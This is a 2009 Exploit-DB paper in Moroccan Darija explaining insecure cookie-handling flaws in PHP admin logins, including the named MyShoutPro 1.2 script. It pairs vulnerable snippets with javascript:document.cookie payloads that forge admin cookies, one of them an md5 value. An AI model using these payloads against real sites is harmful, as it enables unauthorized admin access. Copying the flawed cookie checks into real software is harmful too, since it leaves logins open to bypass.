[Morocco] Playing with cookies (ST1)

EDB-ID:

12954

CVE:

N/A


Author:

Stack

Type:

papers


Platform:

Multiple

Date:

2009-02-27


  |=--------------------------------------------------------------------=|
  |=-------------=[  Playing with cookies (ST1) (Morocco)  ]=-----------=|
  |=-----------------------=[ 25 February 2009 ]=-----------------------=|
  |=---------------------=[  By Mountassif Moad  ]=---------------------=|
  |=--------------------------------------------------------------------=|
    
                ###########          Lwlad leblad o mgharba tal moute         ##########
######
 Info
######
###########################################################################
[+]                                                                       
[+] Language : Morocco darija
[+]
[+] By       : Mountassif Moad   (Stack)          
[+]
[+] Website  : www.v4-team.com
[+]
[+] Date     : 2009-02-25
[+]
[+] MilHome  : http://www.milw0rm.com/author/1331
[+]                                                                       
###########################################################################

##########
 Mohtawayate
##########
[0x00] - Mo9adima
[0x01] - 3ard
[0x02] - khatima
[0x03] - l3azz l
[0x04] - Kridi

#######################
 [0x00] - Mo9adima
#######################
salamo 3laykome lyouma darete liya flekhwa wana ngoule aji ncherho
lwlad leblad kifache nektachfo les faille diyale cookies
wli tansemiwha  Insecure Cookie Handling Vulnerability
ktebte dine mo hadchi bdarija abche yfehmo liha rire wlade leblad
dinmhome hadouke l9rouda lakhrine li 3la bali w balkome
nekarine lkhire alahoma yetlaho ncherho bdarija mayfahmo fiha hta weza :d o li bgha yefheme yet3eleme darija
hhhhhh
##########
[0x01] - 3ard
##########
-----
1
-----
almohime nebdawe b te9labe fe php

code php 1 :
if ($_COOKIE["login"] == "OK")
    {
header("location: admin.php");
 }
    else
    {
 echo "lekmala diyale la page php "
 
hna le code ti 9eleb wache lam3louma diyale
cookies kina menregistri fe l browser diyalke  (login=ok)
ila l9aha kina ti douze la page admin.php o ila makanche lcookies
shihe ti kemel like la page o matatedkholche l admin
njerbo 3la mital haye
-----
2
-----
hadi : http://www.milw0rm.com/exploits/5845 
telecharger mene hna : http://www.zeldaforums.net/scripts/myshoutpro1.2.zip
lmohime ndekhlo l fichier admin.php fe la ligne 37 kayne hade code

code php 2 :
<?php
$admin_cookie=$_COOKIE['admin_access'];
if($admin_cookie == "") {
?>
alor hna tanchoufo beli $admin_cookie=admin_access
o kina (if) ya3ni (ila)
$admin_cookie == ""  - = -  admin_access == ""
"" = aya haja ola madire wlaou
alor hiya

admin_access=0
exploit : javascript:document.cookie = "admin_access=0; path=/";
apré matexecuti lexploit radi yekhreje like message
You are logged in. Click here to proceed.
tekliki o tedkhole admin

-----
3
-----
daba ndouzo l code akhore

code php 3 :

if ($user == $username && $pass == $password){
 
   setcookie("login", "OK", time());
hna nbaziwe 3la hade star    =>  setcookie("login", "OK", time()); 

setcookie hadi function fe php ila bghito te9rawe 3liha ici http://fr.php.net/setcookie
hade function kathadede aya haja bache tsefetha l cookies
w bima ana hna kine kalimate w li homa
login & Ok
te9dere tkoune rire haka

setcookie("login", "OK")

lmohime lexploit diyale hadi hta howa sahleeb bhalha bhale li sab9o
Exploit: javascript:document.cookie = "login=OK; path=/";
----
4
----

code php 4 :

$user=$_POST['username'];
$pass=$_POST['password'];
$select_admin = mysql_query("SELECT * FROM cms_admin");
while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}
if ($user == $username && $pass == $password){
 
   setcookie("login", $username, time());

hna 9adiya chwiya mrida ncherho hade code

setcookie("login", $username, time());

hna tanlahdo beli kine motaghayire $username
hade motagahyire $username=username
weli howa diyale admin
alor bache tekhdeme lina taghra kahsna walaboda ndiro user diyale admin
matalane ila user diyale admin = administrator
alor lexploit rada tkoune hakda

Exploit: javascript:document.cookie = "login=administrator; path=/";
 
----
5
----

code php 5 :

ta9ribane hakda

$user=$_POST['username'];
$pass=$_POST['password'];
$select_admin = mysql_query("SELECT * FROM cms_admin");
while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}
if ($user == $username && $pass == $password){
 
   setcookie("login", md5($username), time());

hade code bhale lcode li f lexample 4
mé hna kine wahede ziyada hiya tachfire b md5
chofou m3ya hade star

   setcookie("login", md5($username), time());

setcookie chrahnaha
login howa smiya li radi tsefete la function setcookie l cookies
md5($username) hadi tate3ni l username mchafere b md5
alor ila username amdin hna makanche mchafere b md5 maradiche ndekhlo l la lawha diyale admin
o lexploit rada tkoune hakda

Exploit: javascript:document.cookie = "login=200ceb26807d6bf99fd6f4f0d1ca54d4; path=/";

administrator = 200ceb26807d6bf99fd6f4f0d1ca54d4

-------------------------------------------------------------------------

#######################
 [0x02] - khatima
#######################
khedma 3alam ya salam tsenawe wahede video adi ykoune zwiwene
une autre methode bache tktachfo insecure cookies
#######################
 [0x03] - l3azz l
#######################
lga3 lmgharba :d
khosousane : Houssamix & simo-soft & djekmani & Gor & Simo64 & Sec-alert & issam & ana :d
limasriyine lhabayibe : darbate mi9asse haji
 
------[ 0x04 - kridi ]
Author: Mountassif Moad
mail: ma3adkome madiro bihe :d
site: http://v4-team.com 

# milw0rm.com [2009-02-27]